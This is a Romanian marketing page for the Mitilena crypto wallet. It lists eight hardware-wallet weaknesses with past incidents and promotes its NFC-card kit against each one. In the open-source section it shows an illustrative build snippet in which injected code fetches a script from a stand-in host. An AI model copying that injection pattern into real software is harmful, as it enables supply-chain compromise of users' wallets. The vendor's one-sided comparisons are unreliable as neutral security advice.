8 breșe Cod deschis Listă de control Întrebări
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Creează portofelCreează
Portofele hardware · breșe neevidente

Breșe neevidente ale unui portofel hardware

Cumperi un dispozitiv ca să închizi găurile. Odată cu el apar altele: firmware, actualizări, un serviciu pe calculator, un ecran, o cutie, un cont la vânzător. Opt detalii pe care recenziile le pun la plusuri — și opt feluri prin care, prin ele, s-au luat bani în 2020–2026.

Cazuri reale cu date și sume După documentația producătorilor Kitul nostru îl verificăm pe aceeași listă
Costul greșeliicazuri publice
2026Coldcard · aleatoriu slab în firmware$100M+
2025Bybit · semnatarii au semnat ce nu vedeau$1,5 mld
2024Dark Skippy · seed-ul iese prin două semnăturicercetare
2023Ledger Connect Kit · backdoor într-o bibliotecă$600 mii
2021Aplicație falsă de portofel în App Store17,1 BTC
2020Scurgere baza clienților Ledger · phishing ani de zile270.000 pers.
Opt breșe

Fiecare detaliu lăudat în recenzii e o gaură separată

Portofelul hardware închide o singură gaură: cheia nu mai stă pe telefonul cu internet. Dar dispozitivul nu e gol. Are firmware, actualizări, un program pe calculator, un ecran, o cutie, un vânzător cu adresa ta — și fiecare detaliu adaugă o suprafață de atac pe care înainte nu o aveai. Mai jos, opt astfel de detalii: ce spun recenziile, cum s-au luat banii prin ele, cum închizi gaura și dacă kitul nostru are acel detaliu.

Breșa 01

Firmware-ul care creează cheia ta

În recenzii: «cip securizat — cheia e creată în dispozitiv și nu iese niciodată»

Cheia e un număr aleatoriu uriaș, iar firmware-ul o face. Un singur bug acolo — și cheile sunt mult mai puține decât crezi: sunt forțate la toți deținătorii deodată, fără acces la dispozitiv, ani după cumpărare. Cipul nu contează; gaura e deasupra lui.

Caz
$100M+
Coldcard, iulie 2026: o eroare de build a firmware-ului din 2021 a înlocuit în tăcere RNG-ul hardware cu unul slab, însămânțat din serialul dispozitivului și un timer. Rezistența cheilor a scăzut la circa 40 de biți; 5.000+ adrese au fost golite.
Cum închizi gaura
Poți aduce propriul aleatoriu: zaruri, o frază a ta. Un portofel care acceptă entropie de la tine nu depinde de un singur bug de firmware.
Acest detaliu la noi nu există
Pe card nu există firmware — e un suport criptat. Mitilena Air creează cheia din RNG-ul de sistem al dispozitivului, iar tu poți seta o frază-seed proprie în loc de cuvinte aleatorii.
Breșa 02

Actualizări pe care ești obligat să le instalezi

În recenzii: «producătorul publică regulat actualizări de securitate»

Fiecare actualizare e momentul în care firmware-ul poate fi înlocuit. Un firmware manipulat ascunde fragmente de seed în două sau trei semnături obișnuite, iar dispozitivul arată normal din exterior. Să sari peste actualizări nu e nici asta o opțiune: găurile se închid tot cu acele actualizări.

Caz
2 signatures
Dark Skippy, august 2024: cercetătorii au arătat că un firmware rău intenționat al unui portofel hardware poate exfiltra tot seed-ul prin două tranzacții. Ajunge o singură actualizare din locul greșit.
Cum închizi gaura
De unde vine firmware-ul și dacă dispozitivul îi verifică semnătura. Cel mai bine e când nu există absolut nimic de actualizat.
Acest detaliu la noi nu există
Pe card nu există nimic de actualizat sau de înlocuit. Semnarea se face în aplicația de pe telefon; build-urile ei sunt semnate și vin din App Store și Google Play — ca orice aplicație pe care o vezi și o închizi tu.
Breșa 03 · Simți absurdul
În recenzii: «o aplicație oficială comodă pe calculator»

Un portofel pentru neîncredere livrat cu un serviciu în fundal

Cumperi un dispozitiv dintr-un singur motiv: să nu te mai încrezi în calculator. Ca să funcționeze, trebuie să instalezi un serviciu în fundal pe același calculator. Nu l-ai scris, nu l-ai pornit și nu-l controlezi: pornește cu SO-ul, ascultă un port pe care îl poate lovi orice program de pe mașină și face ceva chiar acum — exact ce, nu știi și nu vei verifica niciodată.

A continuat să ruleze în fundal după ce ai închis portofelul. Ani de zile. La unul dintre cei mai mari producători era un serviciu-«punte» separat; în 2025 l-au ascuns în aplicația însăși — serviciul există în continuare, moare doar odată cu fereastra. La majoritatea celorlalți, fără un program pe calculator dispozitivul e un breloc. Pe Linux adaugi reguli udev, altfel sistemul nu cedează USB-ul.

Deci lucrul pe care l-ai cumpărat ca să nu depinzi de programele de pe calculator nu funcționează fără un program pe calculator. Și nu pe cel pe care îl vezi — pe cel care rulează dedesubt.

Acest detaliu la noi nu există
Pe calculator nu se instalează nimic: nici serviciu, nici driver, nici port. Intermediarul e cipul NFC deja din telefon, făcut de producătorul lui și guvernat de SO: funcționează doar când aplicația e deschisă și tu atingi cardul, iar telefonul cere permisiunea de fiecare dată. Cardul e pasiv: fără baterie, fără radio, singur nu face nimic. Închizi aplicația — nu rămâne nimic care să ruleze fără tine. Onest: tot ai nevoie de o aplicație pe telefon și e ca oricare alta — o vezi, o pornești și o închizi tu. În cămară nu locuiește nimeni.
Monitor de sistemPORTOFEL ÎNCHIS
ProcesStateUptime
HW Wallet Appwallet
închis de tine-
hwwalletdserviciu în fundal · punte USB
activ412d 06:14
pornit de sistem la loginnu se poate închide — e un serviciu
Mockup; numele sunt illustrative. Așa arăta un calculator cu unul dintre cele mai populare USB-wallet-uri înainte de 2025; apoi «puntea» a fost încorporată în aplicație — același serviciu, doar că nu se mai vede în listă.
Alegorie
O casă pentru intimitate — și un chiriaș în cămară

Voiai o casă pentru intimitate. Ai cumpărat-o. Apoi trebuia pază — ai instalat-o. Și ca planul de pază să funcționeze, ți s-a cerut să lași în casă o persoană în uniformă care locuiește în cămară non-stop, ține cheile tuturor ușilor și raportează altcuiva. Nu l-ai angajat, nu-l poți concedia, iar ce face noaptea — nu știi.

E «de-al nostru», desigur. Scrie în contract. Voiai intimitate și ai primit un surogat: o casă cu un chiriaș pe care nu l-ai ales.

Breșa 04 · Codul deschis nu e un audit
În recenzii: «cod deschis — oricine poate verifica»

Codul deschis e felul în care programatorii lucrează împreună, nu un badge că programul nu fură

Codul deschis a fost inventat ca oamenii să împărtășească programe și să le repare împreună. Ca instrument de colaborare e excelent. Nu a fost niciodată un sigiliu de calitate că «acest software nu îți va fura banii», și iată de ce: nu folosești codul sursă. Folosești ce ai descărcat.

Între un repo GitHub și fișierul de pe telefon stau build-ul, magazinul de aplicații, actualizarea, serverul. În oricare dintre acești pași poate intra o linie de cod care trage orice de oriunde — și în repo nu va fi. Să-ți compari copia cu sursa nu poți: magazinele livrează un fișier compilat; un web-wallet primește ce cod a ales serverul să-ți servească azi; o extensie de browser se actualizează în tăcere noaptea.

«Deschis» înseamnă că unele persoane pot verifica o anume versiune într-o anume zi. Ce face copia ta chiar acum — asta nu înseamnă.

În repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Pe telefonul tău · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
O linie în build. Nu e în repo, invizibilă în magazin, rulează pe dispozitivul tău.
Deschiderea nu a împiedicat niciunul dintre aceste cazuri
Ledger Connect Kit2023
bibliotecă deschisă pe GitHub; o versiune rău intenționată a fost publicată pe npm; zeci de site-uri au încărcat-o live în câteva ore
Copay / event-stream2018
portofel open source; backdoor-ul a venit printr-o dependență țintită exact spre el
xz utils2024
deschis de douăzeci de ani; un backdoor stătea în release-uri până când un inginer a observat că login-ul SSH era cu o jumătate de secundă mai lent
Coldcard2026
firmware open source; o eroare de build timp de cinci ani a înlocuit RNG-ul hardware cu unul slab — chei forțate fără acces la dispozitiv, 5.000+ adrese, 100+ mln $
Ce funcționează atunci
Nu citirea codului altcuiva — două controale pe care oricine le poate rula. Primul, un audit de comportament: pui pe calculator un proxy de interceptare, treci aplicația prin el și vezi ce și unde trimite. Nu trebuie să citești codul — traficul e pe deplin vizibil. Al doilea, o arhitectură în care codului nu îi rămâne nimic de furat: dacă cheia nu stă niciodată pe un dispozitiv conectat la rețea, orice linie din orice actualizare e neputincioasă — nu are ce să trimită.
Cum la noi
Primul îl propunem noi: treci aplicația noastră printr-un proxy, versiunea web prin DevTools din browser și inspectează fiecare cerere. Cheia de semnare și seed-ul nu vor apărea; unica mențiune e view key-ul Monero — acoperit pe pagina «cum pleacă un transfer». Al doilea e în kit: cheia se naște în Mitilena Air pe un dispozitiv fără internet, trăiește pe card, iar în aplicația online ajunge doar semnătura — acolo nu mai e nimic de proxy-at. Și offline-ul aici e adevărat: în modul air-gap dispozitivul cu cheia nu e legat de nimic — nici cablu, nici Bluetooth; tranzacția intră și iese ca un cod QR pe care îl vezi cu ochii. Nu un portofel «rece» pe cablu atârnat de un calculator online cu propriul serviciu care schimbă cine știe ce.
Breșa 05

Un ecran pe care nu vezi ce semnezi

În recenzii: «confirmare pe ecranul dispozitivului — un virus pe calculator e neputincios»

Ecranul e minuscul și deseori arată un hash sau un «apel la contract», nu adresa și suma. Confirmi ce nu vezi — iar semnătura e totuși onestă, a ta. Ecranul dă un sentiment de control care nu există.

Caz
$1,5 mld
Bybit, februarie 2025: semnatarii cu portofele hardware au confirmat un transfer care în UI părea obișnuit. Dispozitivele arătau date pe care un om nu le putea verifica.
Cum închizi gaura
Destinatar, sumă și tip de operațiune în limbaj uman — nu un hash — și un refuz cu un singur buton.
Cum la noi
Există un ecran, dar e ecranul telefonului: adresă, sumă și tip de cerere în cuvinte — transfer, apel la contract, aprobare — și un buton Refuză. Pentru sume mari — un dispozitiv offline separat care primește tranzacția întreagă.
Breșa 06

O cutie care conține deja un seed

În recenzii: «ajunge într-o cutie sigilată cu sigiliu de securitate»

Un dispozitiv fizic înseamnă livrare, intermediari și marketplace-uri «cu reducere». Portofelul ajunge preconfigurat, cu un seed pe un bilețel înăuntru. Sau o aplicație-clonă din magazin cere să «introduci seed-ul pentru activare».

Caz
17,1 BTC
App Store, 2021: un deținător de portofel hardware a introdus seed-ul într-o aplicație-clonă și a pierdut 17,1 BTC. În același an, după scurgerea bazei, clienților Ledger li s-au trimis dispozitive false cu o scrisoare «mutați seed-ul pe cel nou».
Cum închizi gaura
Inițializezi singur și nu folosești niciodată un seed venit deja scris. Sigiliul nu e o verificare; verificarea e că tu creezi cheia.
Cum la noi
Cardurile ajung goale: creezi cheia și o scrii tu — nu poate exista un seed gata făcut în cutie. Aplicația vine doar din App Store și Google Play pe linkurile de pe site; cere seed-ul doar la import și semnare.
Breșa 07

Un cont la vânzător

În recenzii: «garanție oficială, suport și cont personal»

Ca să cumperi dispozitivul dai producătorului nume, email și adresă de livrare. Securitatea ta depinde acum de baza lui de date. Dacă iese — ani de zile vei primi mesaje să «confirmi seed-ul pe un dispozitiv nou», uneori cu colete.

Caz
270.000 pers.
Ledger, 2020: au ieșit datele a 270.000 de cumpărători, inclusiv adrese poștale. Emailuri, telefoane și colete care cer să «migrezi» seed-ul continuă până azi.
Cum închizi gaura
Cu cât știu mai puțin despre tine, cu atât e mai scurt vectorul: cumpără fără cont, suport care nu cere niciodată seed-ul și regula «seed-ul îl cere doar un hoț».
Acest detaliu la noi nu există
Portofelul funcționează fără înregistrare — fără cont. Vânzătorul cunoaște doar adresa de livrare. Nici suportul, nici aplicația nu cer seed-ul.
Breșa 08

Un singur dispozitiv și un singur bilețel

În recenzii: «carcasă robustă, ecran mare, baterie pentru o săptămână»

Cu cât sunt mai multe piese, cu atât se strică mai multe: conector, ecran, baterie. Recuperarea atârnă de un singur bilețel cu seed — udat, pierdut la o mutare, fotografiat «de siguranță». Cea mai frecventă cauză a pierderii nu e un hack.

Caz
≈20 % BTC
Chainalysis estimează că circa o cincime din tot bitcoinul e pierdut pentru totdeauna — mai ales din cauza cheilor pierdute, nu din hack-uri.
Cum închizi gaura
Câte copii ale cheii vin în cutie și în ce formă, ce se întâmplă dacă dispozitivul e pierdut și dacă există ceva în el care se poate strica.
Acest detaliu la noi nu există
Fără ecran, baterie sau conector — nimic de stricat. Și nu o singură copie: cinci copii-oglindă în cutie — două carduri NFC și trei stickere stealth din plastic impermeabil, 10+ ani.
Listă de control

Ce nu trebuie să existe într-un portofel

Opt detalii pentru opt breșe. Lista se potrivește oricărui portofel — hardware, mobil, browser. Bifează ce are cel pe care îl alegi — și pe al nostru.

01
O cheie creată doar de softwarefără aleatoriul tău — fraza ta sau zaruri
02
Actualizări acolo unde trăiește cheiafiecare actualizare e o șansă de a înlocui codul
03
Un serviciu, driver sau port pe calculatorvezi breșa 03
04
Un badge «open source» în loc de arhitecturăcheia stă acolo unde poate ajunge cod străin
05
Un ecran care arată un hash în loc de adresă și sumăși fără buton Refuză
06
Un seed venit deja scrisîn cutie, într-o scrisoare, într-o «aplicație de activare»
07
Un cont la vânzătorși un suport care poate cere seed-ul
08
O copie unică și piese care se stricăecran, baterie, conector, un singur bilețel
Pe această listă, kitul Ultimate nu are niciunul dintre cele opt detalii. În cutie: 2 carduri NFC și 3 stickere stealth, Mitilena Air (chei fără internet) și Mitilena Keys (semnare fără internet). Cardurile ajung goale: tu creezi și criptezi cheia — nu un cip din fabrică. Conținut și preț →
Ultimate · kit offline

Nu un «cip securizat» din fabrică — un suport pe care îl criptezi tu

Cardurile ajung goale. Creezi cheia în Mitilena Air pe un telefon fără internet și o scrii tu. Semnarea e prin Mitilena Keys, tot offline: tranzacția călătorește prin QR. Cinci copii identice în cutie: 2 carduri NFC și 3 stickere stealth din plastic impermeabil. 18 rețele, 20.000+ monede, inclusiv USDT.

Nimic nu se instalează pe calculator
Fără firmware, actualizări, ecran sau baterie
Tranzacție către un telefon offline — prin sunet sau QR, fără cablu sau USB
Funcționează cu aplicația Mitilena gratuită pe telefon
Plastic impermeabil, durată de păstrare 10+ ani
Livrare mondială · mitilena-store.com
Card NFC Mitilena
Ultimate · generare și semnare offline
€369€439
2 carduri NFC · 3 stickere stealth · Mitilena Air · licență Mitilena Keys
Cumpără Ultimate · €369 Base și Premium — vezi toate planurile
Întrebări

Ce întreabă oamenii după ce au citit până aici

Plusuri și minusuri ale portofelului hardware — pe scurt?

Un plus mare: cheia nu e pe un telefon cu internet. Minusurile sunt cele opt detalii de mai sus — fiecare adaugă suprafață de atac. Un portofel hardware bun e cel cu mai puține detalii, nu cu mai multe.

Și dacă telefonul e compromis?

Cu un card pe telefonul principal cheia apare într-un mediu izolat pentru secunda semnării — același risc ca la orice portofel pe telefon, doar mai scurt. Pentru sumele care te sperie — un al doilea strat: semnezi pe un dispozitiv offline separat la care tranzacția ajunge prin QR.

Și dacă cardul e furat sau pierdut?

Fără parolă cardul și stickerul sunt plastic inutil — cheia de pe ele e criptată. O copie pierdută e înlocuită de celelalte patru: două carduri și trei stickere din cutie sunt oglinzi.

Trebuie să actualizezi firmware-ul unui portofel hardware?

Dacă producătorul a închis o gaură — da, și exact atunci firmware-ul poate fi înlocuit: verifică sursa și semnătura. Un suport fără firmware nu are o astfel de alegere — nimic de actualizat, nimic de înlocuit.

Prin ce diferă de un USB-wallet?

Mai puțini intermediari: fără cablu, driver, serviciu în fundal sau program pe calculator. Un singur intermediar — cipul NFC al telefonului tău — și răspunde ție și SO-ului, nu producătorului de portofel.

Cod deschis înseamnă sigur?

Înseamnă verificabil de cineva, cândva. Nu folosești codul, ci ce ai descărcat, și nu poți compara unul cu celălalt. Siguranța vine din arhitectura în care cheia nu e acolo unde poate ajunge cod străin.

Carduri NFC cu generare și semnare offline

5 copii ale cheii · Air · Keys · sau un portofel gratuit în 30 de secunde · De ce un portofel hardware «rece» bazat pe cipul securizat din fabrică este adesea un cold de depozitare fals →
Cumpără Ultimate · €369 Creează un portofel gratuit